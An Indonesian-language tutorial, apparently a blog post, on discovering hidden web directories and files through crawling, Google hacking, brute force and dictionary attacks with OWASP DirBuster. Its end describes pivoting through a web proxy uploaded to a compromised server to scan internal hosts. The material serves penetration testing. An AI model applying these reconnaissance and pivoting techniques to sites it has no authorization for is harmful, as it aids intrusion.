Saya pernah menemukan sebuah website yang securitynya bagus, saya tidak menemukan vulnerability di sana, namun ternyata dia lupa membuang versi lama dari web tersebut. Namun ternyata web versi lama yang mengandung banyak bug dari SQL injection sampai local file injection masih bisa diakses di direktori lain. Walaupun web versi terbaru securitynya bagus, namun jadi tidak berarti apa-apa karena hacker bisa menyerang dari web versi lamanya.
Berburu Direktori dan File Sensitif
Nama direktori atau file bisa ditemukan dengan 2 cara:
  • Crawling
Crawling ini adalah cara yang dipakai oleh search engine untuk mendapatkan isi website anda.  Ini adalah cara yang “sopan”, karena kita hanya mencari apa yang memang disediakan oleh pemilik webnya. Search engine crawling akan mengikuti direktori apa yang boleh dan apa yang tidak boleh diambil dalam file /robots.txt. Jadi bila ada direktori sensitif yang bisa di-search di Google, maka itu terjadi karena di suatu situs ada pointer ke obyek itu berupa link. Bila di seluruh jagat internet ini tidak ada satupun link ke direktori itu, maka tidak mungkin direktori itu muncul di Google.
Kita bisa memanfaatkan Google Hacking untuk mencari direktori sensitif yang sengaja atau tidak sengaja ter-index oleh Google. Kita juga bisa membuat script atau memakai program semacam wget untuk melakukan crawling website  (tidak memanfaatkan Google index). Menjalankan crawler sendiri terkadang diperlukan bila kita ingin melakukan crawling direktori yang search engine dilarang untuk masuk (diblacklist di /robots.txt).
  • Guessing
Bila dengan cara sopan tidak mendapatkan direktori sensitif, maka kita terpaksa pakai cara “kasar”. Mendapatkan direktori sensitif dengan cara ini sama dengan menebak password. Ada dua cara yang bisa dipakai:
  1. Pure Brute Force Attack
  2. Cara ini adalah cara yang paling kasar. Kita mencoba semua kemungkinan kata yang muncul dari huruf , angka dan karakter lain sebagai nama direktori atau nama file. Contoh: request /aa/, lalu /ab/, lalu /ac/, lalu /ad/, demikian seterusnya sampai semua kemungkinan yang ada dicoba. Cara ini membutuhkan waktu yang sangat lama, jadi kurang efektif. Tapi kelebihannya adalah tidak ada direktori yang lolos, karena semua kemungkinan akan dicoba.
  3. Dictionary Attack
  4. Ini adalah cara yang lebih sopan dibanding pure brute force. Kita menggunakan kamus, yaitu kumpulan nama yang akan kita pakai untuk request ke web server. Efektif tidaknya cara ini tergantung dari bagaimana kualitas kamus yang dipakai. Semakin baik kualitas kamusnya, semakin besar kemungkinan berhasil mendapatkan direktori sensitif. Kamus yang baik adalah kamus berisi kata yang memang benar-benar pernah dipakai untuk nama direktori, jadi bukan nama fiktif atau karangan.
DirBuster dari OWASP
Dalam artikel ini saya akan menggunakan tools gratisan, DirBuster yang dibuat oleh OWASP (Open Web Application Security Project), sebuah kelompok non-profit yang berfokus pada keamanan web. Seperti yang sudah saya katakan sebelumnya, kekuatan tools semacam ini tergantung pada kualtias kamus yang dimilikinya.
DirBuster memiliki kamus yang sangat lengkap, bukan nama fiktif yang tidak pernah dipakai, tapi memang benar-benar nama yang pernah dipakai sebagai nama direktori. Kumpulan nama ini didapatkan dari internet dengan cara melakukan crawling terhadap situs-situs internet lalu mengelompokkannya. Kumpulan nama yang dipakai minimal 3 situs berbeda ditaruh di file dengan akhiran small.txt, kumpulan nama yang dipakai minimal 2 situs berbeda ditaruh di file dengan akhiran medium.txt, dan semua nama yang ditemukan ditaruh dalam file berakhiran big.txt.
Bila anda membutuhkan daftar nama direktori saja untuk dipakai di program lain, anda juga bisa mendownload kamusnya saja tanpa harus mendownload DirBuster.
Tools ini sangat mudah digunakan, jadi silakan saja langsung download DirBuster. Sebelumnya pastikan dulu komputer anda sudah terinstall Java, karena tools ini dibuat dengan Java.
Scanning Type
Ada dua jenis scanning yang bisa dilakukan, pure brute force atau dictionary based attack. Bila anda memilih memakai teknik pure brute force, maka anda harus menentukan character set (kumpulan karakter) yang akan dijadikan nama direktori dan tentukan juga panjang minimal dan maksimalnya. Semakin besar populasi dari character set yang anda pilih dan semakin panjang max length yang anda pilih, semakin besar kumpulan kata yang dihasilkan, itu artinya dibutuhkan waktu yang semakin lama untuk mencoba semuanya. Gambar di bawah ini adalah screenshot ketika memilih pure brute force.


Bila memilih list based brute force, maka kita harus memilih file berisi daftar nama direktori. DirBuster sudah menyediakan banyak dictionary yang bisa dipilih sesuai kebutuhan:
  • directory-list-2.3-small.txt  (87650 words) : Minimal dipakai di 3 situs berbeda.
  • directory-list-2.3-medium.txt  (220546 words) : Minimal dipakai di 2 situs berbeda.
  • directory-list-2.3-big.txt  (1273819 words) : Minimal pernah dipakai.
  • directory-list-lowercase-2.3-small.txt  (81629 words) : Versi case insensitive dari directory-list-2.3-small.txt
  • directory-list-lowercase-2.3-medium.txt  (207629 words) : Versi case insensitive dari directory-list-2.3-medium.txt
  • directory-list-lowercase-2.3-big.txt  (1185240 words) : Versi case insensitive dari directory-list-2.3-big.txt
  • directory-list-1.0.txt  (141694 words)  : Daftar awalnya, tidak terurut
  • apache-user-enum-1.0.txt  (8916 usernames) : Dipakai untuk user enumeration, mendapatkan valid username di sebuah server
  • apache-user-enum-2.0.txt  (10341 usernames) : Dipakai untuk user enumeration
Dalam list yang disediakan DirBuster juga menyediakan daftar username yang dipakai untuk user enumeration, yaitu mendapatkan nama user yang valid di sebuah server. Dalam web server Apache yang mengaktifkan mod_userdir, bisa dilakukan user enumeration dengan cara menggunakan ~namauser sebagai nama direktori.
Gambar di bawah ini adalah screenshot ketika kita memilih menggunakan dictionary attack.


  Starting Options



Pilihan lain yang harus dipilih adalah starting options, yaitu di mana titik mulainya DirBuster mencari direktori. Pilihannya adalah standard start point, atau URL Fuzz. Standard start point adalah pilihan yang paling banyak digunakan karena pilihan ini berarti kita meminta DirBuster untuk menggunakan nama direktori sebagai titik awal.
Pilihan yang ada ketika kita memilih Standard Start Point adalah checkbox Brute Force Dirs yang bisa dimatikan bila kita tidak ingin ingin membrute Direktori. Brute Force Files bisa dimatikan bila kita tidak ingin mencari file. Dua pilihan tersebut bisa diatur sesuai kebutuhan, apakah ingin mencari direktori dan nama file, atau direktori saja, atau nama file saja.
Pilihan File extention bisa diisi dengan ekstensi file yang ingin dicari, misalnya bisa kita isi dengan php, zip, gz, tar.gz. Namun bila kita tidak ingin menggunakan ekstensi, kita bisa centang pilihan Use Blank Extention.
Pilihan Be Recursive digunakan untuk membuat DirBuster melakukan pencarian secara mendalam (Deep First Search), yaitu mencari subdirektori dalam sebuah direktori, mencari sub-subdirektori dalam subdirektori dan seterusnya sampai kedalaman tertentu.




Ada kalanya kita harus membrute force nama direktori yang merupakan bagian dari parameter URL. Dalam kasus seperti itu kita bisa memakai pilihan URL Fuzz. Salah satu contoh kasusnya adalah ketika kita ingin melakukan scanning melalui sebuah web based proxy seperti PHPProxy






Ketika kita ingin scanning website internal dengan IP address private dari website public yang sudah berhasil kita susupi, kita bisa gunakan PHProxy. URL PHProxy biasanya berbentuk http://somewebsite/myproxy/?q=http://situstarget/{dir}. Dalam kasus seperti ini, pilihan URL Fuzz bisa sangat berguna. Gambar di bawah ini menunjukkan skenario tersebut. Setelah seorang hacker berhasil menguasai web server public, dia akan mengupload web based proxy seperti PHProxy. Dengan proxy tersebut hacker bisa melebarkan serangannya ke arah dalam dengan menyerang web server internal yang tidak bisa dijangkau dari internet.




Walaupun tools ini sangat sederhana, tapi jangan remehkan keampuhannya. Silakan coba saja sendiri, mungkin nanti anda akan terkejut melihat banyaknya webmaster yang sembrono menaruh file/direktori sensitif di websitenya.